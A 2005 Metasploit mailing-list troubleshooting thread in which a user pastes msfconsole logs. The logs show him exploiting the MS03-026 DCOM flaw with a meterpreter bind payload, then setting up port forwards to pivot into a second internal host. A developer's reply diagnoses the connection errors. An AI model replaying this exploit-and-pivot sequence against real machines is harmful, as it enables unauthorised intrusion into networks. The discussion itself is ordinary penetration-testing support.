Metasploit mailing list archives
use of meterpreter (copy for the list )
From: thomas.werth at vahle.de (Thomas Werth)
Date: Tue, 19 Apr 2005 08:05:23 +0200
i just rechecked vulnerability of host to be sure not to have an invulnerable host. So i'm using now former proxy host as target host and a new vulnerable host as proxy host. Now i get an error 11001. here's the log _ _ _ _ | | | | (_) | _ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_ | '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __| | | | | | | __/ || (_| \__ \ |_) | | (_) | | |_ |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__| | | |_| + -- --=[ msfconsole v2.3 [56 exploits - 69 payloads] msf > use msrpc_dcom_ms03_026 msf msrpc_dcom_ms03_026 > set RHOST 10.10.10.185 RHOST -> 10.10.10.185 msf msrpc_dcom_ms03_026 > set PAYLOAD win32_bind_meterpreter PAYLOAD -> win32_bind_meterpreter msf msrpc_dcom_ms03_026(win32_bind_meterpreter) > show options Exploit and Payload Options =========================== Exploit: Name Default Description -------- ------ ------------ ------------------ required RHOST 10.10.10.185 The target address required RPORT 135 The target port Payload: Name Default Descrip tion -------- -------- ------------------------------------------- ------- ----------------------------------- required EXITFUNC thread Exit te chnique: "process", "thread", "seh" required METDLL /home/framework/data/meterpreter/metsrv.dll The ful l path the meterpreter server dll required LPORT 4444 Listeni ng port for bind shell Target: Windows NT SP6/2K/XP/2K3 ALL msf msrpc_dcom_ms03_026(win32_bind_meterpreter) > exploit [*] Starting Bind Handler. [*] Connected to REMACT with group ID 0x92ca [*] Got connection from 10.10.10.56:1156 <-> 10.10.10.185:4444 [*] Sending Stage (2834 bytes) [*] Sleeping before sending dll. [*] Uploading dll to memory (69643), Please wait... [*] Upload completed meterpreter> [ -= connected to =- ] [ -= meterpreter server =- ] [ -= v. 00000500 =- ] meterpreter> use -m Net loadlib: Loading library from 'ext699020.dll' on the remote machine. meterpreter> loadlib: success. meterpreter> portfwd -a -L 127.0.0.1 -l 9000 -h 10.10.10.88 -p 135 portfwd: Successfully created local listener on port 9000. meterpreter> portfwd -a -L 127.0.0.1 -l 4444 -h 10.10.10.88 -p 4444 portfwd: Successfully created local listener on port 4444. meterpreter> portfwd -v Local port forward listeners: 127.0.0.1:9000 <-> 10.10.10.88:135 127.0.0.1:4444 <-> 10.10.10.88:4444 meterpreter> open_tcp_channel: failure, 11001. meterpreter> ------------ second shell : -------------- 888 888 d8b888 888 888 Y8P888 888 888 888 88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888 888 "888 "88bd8P Y8b888 "88b88K 888 "88b888d88""88b888888 888 888 88888888888888 .d888888"Y8888b.888 888888888 888888888 888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b. 888 888 888 "Y8888 "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888 888 888 888 + -- --=[ msfconsole v2.3 [56 exploits - 69 payloads] msf > use msrpc_dcom_ms03_026 msf msrpc_dcom_ms03_026 > set PAYLOAD win32_bind PAYLOAD -> win32_bind msf msrpc_dcom_ms03_026(win32_bind) > set RHOST 127.0.0.1 RHOST -> 127.0.0.1 msf msrpc_dcom_ms03_026(win32_bind) > set RPORT 9000 RPORT -> 9000 msf msrpc_dcom_ms03_026(win32_bind) > show options Exploit and Payload Options =========================== Exploit: Name Default Description -------- ------ --------- ------------------ required RHOST 127.0.0.1 The target address required RPORT 9000 The target port Payload: Name Default Description -------- -------- ------- ------------------------------------------ required EXITFUNC thread Exit technique: "process", "thread", "seh" required LPORT 4444 Listening port for bind shell Target: Windows NT SP6/2K/XP/2K3 ALL msf msrpc_dcom_ms03_026(win32_bind) > exploit [*] Starting Bind Handler. [*] Got connection from 127.0.0.1:1221 <-> 127.0.0.1:4444 [*] Exiting Bind Handler. msf msrpc_dcom_ms03_026(win32_bind) > mmiller at hick.org schrieb:
On Mon, Apr 18, 2005 at 10:07:48AM +0200, Thomas Werth wrote:Does the bind handler ever say it established the connection? Does it say this before or after the 'Connected to REMACT'? If it says that the bind handler has established the connection before the 'REMACT' line then you may have created the port forward too soon. Can you include the full output from the exploit command?bind handler doesn't say it establishes a connection. Just saw that on meterpreter window an error is thrown up open_tcp_channel: failure, 10061.The above error code indicates why it's not working. 10061 is WSACONNREFUSED. This means that when the meterpreter server instance attempted to connect to 10.10.10.77 on port 135 (or 4444 depending on the stage), the connection was refused. This is probably indicative of the fact that the exploit did not work against the machine that you are attempting to target. Are you certain that it's vulnerable?
Current thread:
- use of meterpreter (copy for the list ), (continued)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 14)
- use of meterpreter (copy for the list ) mmiller at hick.org (Apr 14)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 14)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 14)
- use of meterpreter (copy for the list ) mmiller at hick.org (Apr 15)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 15)
- use of meterpreter (copy for the list ) mmiller at hick.org (Apr 15)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 18)
- use of meterpreter (copy for the list ) mmiller at hick.org (Apr 18)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 18)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 18)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 19)
- use of meterpreter (copy for the list ) mmiller at hick.org (Apr 19)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 19)
- use of meterpreter (copy for the list ) mmiller at hick.org (Apr 20)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 14)